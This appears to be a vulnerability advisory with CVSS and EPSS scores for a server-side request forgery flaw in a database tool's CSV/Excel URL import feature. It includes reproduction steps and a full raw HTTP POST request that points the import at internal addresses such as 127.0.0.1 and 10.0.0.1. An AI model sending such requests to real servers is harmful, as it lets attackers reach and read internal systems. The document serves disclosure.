7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
45.9%
While importing CSV and Excel file via an URL, the server does not validate requests properly that’s how the attacker can able to make requests to internal servers and access the contents.
Dashboard
, click on Add / Import
> CSV or Microsoft Excel
> URLhttp://127.0.0.1:PORT
or http://10.0.0.1
responseType
parameter to “BLANK”POST /api/v1/db/meta/axiosRequestMake HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
xc-gui: true
xc-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJlbWFpbCI6ImRldkBsb2NhbC5ob3N0IiwiZmlyc3RuYW1lIjpudWxsLCJsYXN0bmFtZSI6bnVsbCwiaWQiOiJ1c184OTJhemRkY2F5cXFvcCIsInJvbGVzIjoiIsInRva2VuX3ZlcnNpb24iOiI0MWU5ZDUwIzYWQ2NjFjZjMzNzUxMmJlZDIwZDllNzliNSIsImlhdCI6MTY1NTE4Mjc2OH0.zE-Z0xoYcmKn1Fp5inqdzmf3gfMXWvl64GbS8ahPpF4
Content-Length: 55
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/dashboard/
Cookie: refresh_token=924112616a665e0baeca68cc4c1b815d23d971f655651fe12669176cfbb28c8babcfda6
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"apiMeta":{"url":"http://10.0.0.1","responseType":""}}
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
45.9%